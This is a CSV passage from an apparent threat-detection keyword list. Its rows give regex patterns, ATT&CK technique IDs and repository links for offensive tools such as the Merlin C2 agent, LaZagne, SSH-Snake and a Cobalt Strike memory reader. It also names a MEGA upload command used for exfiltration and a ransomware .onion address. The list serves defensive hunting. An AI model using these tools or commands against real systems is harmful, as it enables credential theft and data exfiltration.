"*medusaxko7jxtrojdkxo66j7ck4q5tgktf7uqsqyfry4ebnxlcbkccyd.onion*",".{0,1000}medusaxko7jxtrojdkxo66j7ck4q5tgktf7uqsqyfry4ebnxlcbkccyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","51720"
"*Meedx765taMaedx765sk*",".{0,1000}Meedx765taMaedx765sk.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","51721"
"*megacmd -conf * put *mega:*",".{0,1000}megacmd\s\-conf\s.{0,1000}\sput\s.{0,1000}mega\:.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca - Black Basta","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","51723"
"*megadose/holehe*",".{0,1000}megadose\/holehe.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","#linux","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","51725"
"*megadose@protonmail.com*",".{0,1000}megadose\@protonmail\.com.{0,1000}","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","#email","N/A","6","10","8656","981","2024-09-10T20:24:32Z","2020-06-25T23:03:02Z","51726"
"*MegaManSec/SSH-Snake*",".{0,1000}MegaManSec\/SSH\-Snake.{0,1000}","offensive_tool_keyword","SSH-Snake","SSH-Snake is a self-propagating - self-replicating - file-less script that automates the post-exploitation task of SSH private key and host discovery","T1021.004 - T1027 - T1552.004","TA0002 - TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/MegaManSec/SSH-Snake","1","1","N/A","N/A","10","10","2065","198","2024-07-25T09:32:07Z","2023-12-03T04:52:38Z","51727"
"*MegaMedusa\x20Attacking*",".{0,1000}MegaMedusa\\x20Attacking.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","0","#content","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","51728"
"*meliht/Mr.SIP*",".{0,1000}meliht\/Mr\.SIP.{0,1000}","offensive_tool_keyword","Mr.SIP","Mr.SIP is a simple console based SIP-based Audit and Attack Tool. Originally it was developed to be used in academic work to help developing novel SIP-based DDoS attacks and then as an idea to convert it to a fully functional SIP-based penetration testing tool. So far Mr SIP resulted several academic research papers. and journal articles. Mr.SIP can also be used as SIP client simulator and SIP traffic generator.","T1522 - T1521 - T1523 - T1505 - T1506","TA0010 - TA0002 - TA0043","N/A","N/A","Exploitation tool","https://github.com/meliht/Mr.SIP","1","1","N/A","N/A","N/A","4","399","94","2023-05-21T08:11:20Z","2017-09-07T18:23:00Z","51747"
"*melted@xmpp.jp*",".{0,1000}melted\@xmpp\.jp.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#email","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","51748"
"*Meltedd/HVNC*",".{0,1000}Meltedd\/HVNC.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","51749"
"*Memcrashed-DDoS-Exploit*",".{0,1000}Memcrashed\-DDoS\-Exploit.{0,1000}","offensive_tool_keyword","Memcrashed-DDoS-Exploit","This tool allows you to send forged UDP packets to Memcached servers obtained from Shodan.io","T1436 - T1498 - T1216 - T1190","TA0043 - TA0001","N/A","N/A","Exploitation tool","https://github.com/649/Memcrashed-DDoS-Exploit","1","1","N/A","N/A","10","10","1358","468","2022-12-02T07:14:59Z","2018-03-02T21:19:51Z","51751"
"*memfd implant *.elf*",".{0,1000}memfd\simplant\s.{0,1000}\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","51752"
"*memfd task *.elf*",".{0,1000}memfd\stask\s.{0,1000}\.elf.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","51753"
"*memory*mimipy.py*",".{0,1000}memory.{0,1000}mimipy\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","51754"
"*memory/onepassword.py*",".{0,1000}memory\/onepassword\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","51755"
"*memorydump.py*",".{0,1000}memorydump\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","51756"
"*memorydump.py*",".{0,1000}memorydump\.py.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","51757"
"*memreader *access_token*",".{0,1000}memreader\s.{0,1000}access_token.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","0","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","51758"
"*MemReader_BoF.*",".{0,1000}MemReader_BoF\..{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","51759"
"*Meowmycks/etwunhook*",".{0,1000}Meowmycks\/etwunhook.{0,1000}","offensive_tool_keyword","etwunhook","Simple ETW unhook PoC. Overwrites NtTraceEvent opcode to disable ETW at Nt-function level.","T1055 - T1562.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Meowmycks/etwunhook","1","1","N/A","N/A","9","1","47","11","2024-02-29T10:07:52Z","2024-01-22T22:21:09Z","51760"
"*Meowmycks/LetMeowIn*",".{0,1000}Meowmycks\/LetMeowIn.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","1","N/A","N/A","10","5","401","70","2024-07-08T15:58:37Z","2024-04-09T16:33:27Z","51761"
"*MERGING SHELLCODE WOOOO!!!*",".{0,1000}MERGING\sSHELLCODE\sWOOOO!!!.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#content","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","51762"
"*merlin-*.zip*",".{0,1000}merlin\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/merlin","1","1","N/A","N/A","10","10","94","16","2025-04-16T13:05:47Z","2021-01-25T12:36:46Z","51763"
"*Merlin_ServiceDesc is the grpc.ServiceDesc for Merlin service*",".{0,1000}Merlin_ServiceDesc\sis\sthe\sgrpc\.ServiceDesc\sfor\sMerlin\sservice.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51764"
"*Merlin_v0.1Beta.zip*",".{0,1000}Merlin_v0\.1Beta\.zip.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51765"
"*Merlin_v0.1Beta.zip*",".{0,1000}Merlin_v0\.1Beta\.zip.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51766"
"*merlinAgent-*.7z*",".{0,1000}merlinAgent\-.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51767"
"*merlinAgent-*.exe*",".{0,1000}merlinAgent\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51768"
"*merlinAgent.exe*",".{0,1000}merlinAgent\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51769"
"*merlinAgent-Darwin-*",".{0,1000}merlinAgent\-Darwin\-.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51770"
"*merlinAgent-Darwin-x64-*",".{0,1000}merlinAgent\-Darwin\-x64\-.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51771"
"*merlinAgent-Darwin-x64.*",".{0,1000}merlinAgent\-Darwin\-x64\..{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51772"
"*merlin-agent-dll.7z*",".{0,1000}merlin\-agent\-dll\.7z.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","51773"
"*merlin-agent-dll/tarball/v*",".{0,1000}merlin\-agent\-dll\/tarball\/v.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","51774"
"*merlin-agent-dll/zipball/v*",".{0,1000}merlin\-agent\-dll\/zipball\/v.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","51775"
"*merlin-agent-dll\merlin.*",".{0,1000}merlin\-agent\-dll\\merlin\..{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","0","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","51776"
"*merlinAgent-Linux-*",".{0,1000}merlinAgent\-Linux\-.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","#linux","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","51777"
"*merlinAgent-Linux-x64-*",".{0,1000}merlinAgent\-Linux\-x64\-.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51778"
"*merlinAgent-Linux-x64.*",".{0,1000}merlinAgent\-Linux\-x64\..{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51779"
"*merlinAgent-Windows-x64-*",".{0,1000}merlinAgent\-Windows\-x64\-.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51780"
"*merlinAgent-Windows-x64.*",".{0,1000}merlinAgent\-Windows\-x64\..{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51781"
"*merlinAgent-Windows-x64.exe*",".{0,1000}merlinAgent\-Windows\-x64\.exe.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51782"
"*merlinAgent-Windows-x64.exe*",".{0,1000}merlinAgent\-Windows\-x64\.exe\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51783"
"*merlinAgent-Windows-x86.exe*",".{0,1000}merlinAgent\-Windows\-x86\.exe\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51784"
"*merlin-c2.readthedocs.io*",".{0,1000}merlin\-c2\.readthedocs\.io.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51785"
"*merlin-c2.readthedocs.io*",".{0,1000}merlin\-c2\.readthedocs\.io.{0,1000}","offensive_tool_keyword","merlin-agent-dll","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent-dll","1","1","N/A","N/A","10","10","51","15","2025-04-17T14:01:36Z","2021-04-17T16:58:24Z","51786"
"*MerlinCheatSheet.pdf*",".{0,1000}MerlinCheatSheet\.pdf.{0,1000}","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001  -  T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","N/A","10","10","1161","119","2025-02-03T12:03:19Z","2021-02-09T15:54:23Z","51787"
"*merlinHTTP.HTTP*",".{0,1000}merlinHTTP\.HTTP.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51788"
"*merlinHTTP.JA3*",".{0,1000}merlinHTTP\.JA3.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51789"
"*merlinHTTP.PARROT*",".{0,1000}merlinHTTP\.PARROT.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","51790"
